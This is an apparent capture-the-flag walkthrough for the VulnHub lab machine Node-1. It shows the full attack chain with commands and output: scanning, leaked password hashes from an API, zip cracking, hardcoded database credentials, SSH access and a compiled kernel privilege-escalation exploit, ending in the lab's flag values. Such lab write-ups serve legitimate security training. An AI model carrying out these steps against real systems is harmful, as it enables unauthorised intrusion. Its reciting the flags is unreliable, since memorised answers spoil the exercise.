Walkthrough of the CTF Node-1

ISO

Download here -> https://www.vulnhub.com/entry/node-1,252/

Discover the target IP

$ sudo nmap -sS 192.168.2.0/24
Nmap scan report for 192.168.2.84
- - -
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 08:00:27:A2:8A:95 (Oracle VirtualBox virtual NIC)

Find attack vectors

$ sudo nmap --script vuln 192.168.2.84
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.2.84
Host is up (-0.046s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 08:00:27:A2:8A:95 (Oracle VirtualBox virtual NIC)

Nikto, dirb and gobuster are not effective against a JavaScript application, so we need to use the web spidering feature available in Burp Suite or ZAP.

I will use Burp Suite here. Don't try this with w3m: you need a modern web browser that executes JavaScript in order to discover all the URLs.

Configure the web browser to use the Burp proxy at 127.0.0.1:8080 and browse to http://192.168.2.84:3000.

In Burp Suite: open the Target tab, right-click the server address and select Spider this host. Watch the Proxy tab and forward all requests.

Result after a few clicks:

http://192.168.2.84:3000/api/users/
http://192.168.2.84:3000/api/users/latest
http://192.168.2.84:3000/api/users/tom
http://192.168.2.84:3000/api/partials/home.html
http://192.168.2.84:3000/api/partials/login.html

You can quit Burp Suite and open the page /api/users:

[
  {"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},
  {"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},
  {"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},
  {"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}
]

Open leaked.py to look up these hashes:

Enter your choice (1-4): 2

Enter or paste a hash code you want to check: dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
THAT HASH CODE IS LEAKED! It means: manchester

Enter or paste a hash code you want to check: f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
THAT HASH CODE IS LEAKED! It means: spongebob

Enter or paste a hash code you want to check: de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
THAT HASH CODE IS LEAKED! It means: snowflake

So, in short:

myP14ceAdm1nAcc0uNT : manchester : admin
tom : spongebob
mark : snowflake
rastating : password not found

Log in with the admin account and download the backup file.

$ file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators

An encoded file, probably base64; let's try:

$ base64 -d myplace.backup > myplace
$ file myplace
myplace: Zip archive data, at least v1.0 to extract
$ 7z x myplace
Enter password (will not be echoed):

A password is needed. Since brute-forcing it is not very interesting, I give you the password here: magicword.

$ fcrackzip -v -b -u -p magicword 'myplace'

With a good dictionary, you would do something like this:

$ fcrackzip -v -u -D good_dictionnary.dic 'myplace'

Next, let's look for something interesting in this archive:

$ find var -type f | xargs grep -iE 'key|pass'
var/www/myplace/app.js:const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

Open this file; maybe we will find other secrets:

const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
- - -
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);

We found MongoDB credentials: the username mark and the password 5AYRft73VtFpc84k. There is also a command, /usr/local/bin/backup, used to create the backup; we'll come back to it later.

$ ssh mark@192.168.2.84
password: 5AYRft73VtFpc84k

If you are not prompted for a password (as happened to me), edit your SSH client configuration:

$ vim .ssh/config
Host 192.168.2.84
  PasswordAuthentication yes

It should work now.
Once on the box, find the Linux kernel version.

$ uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Search for an exploit for Linux 4.4.0.

$ searchsploit 4.4.0
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c
- - -
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local | exploits/linux/local/44298.c

Copy and paste the exploit into a file on the Ubuntu box, or send it over with scp:

$ scp /usr/share/exploitdb/exploits/linux/local/44298.c mark@192.168.2.84:/tmp/

On the Ubuntu side:

$ cd /tmp
$ gcc 44298.c
$ ./a.out

We are root:

# cd /root
# cat root.txt
1722e99ca5f353b362556a62bd5e6be0

The other flag is hidden in /home/tom/user.txt :)

e1156acc3574e04b06908ecf76be91b1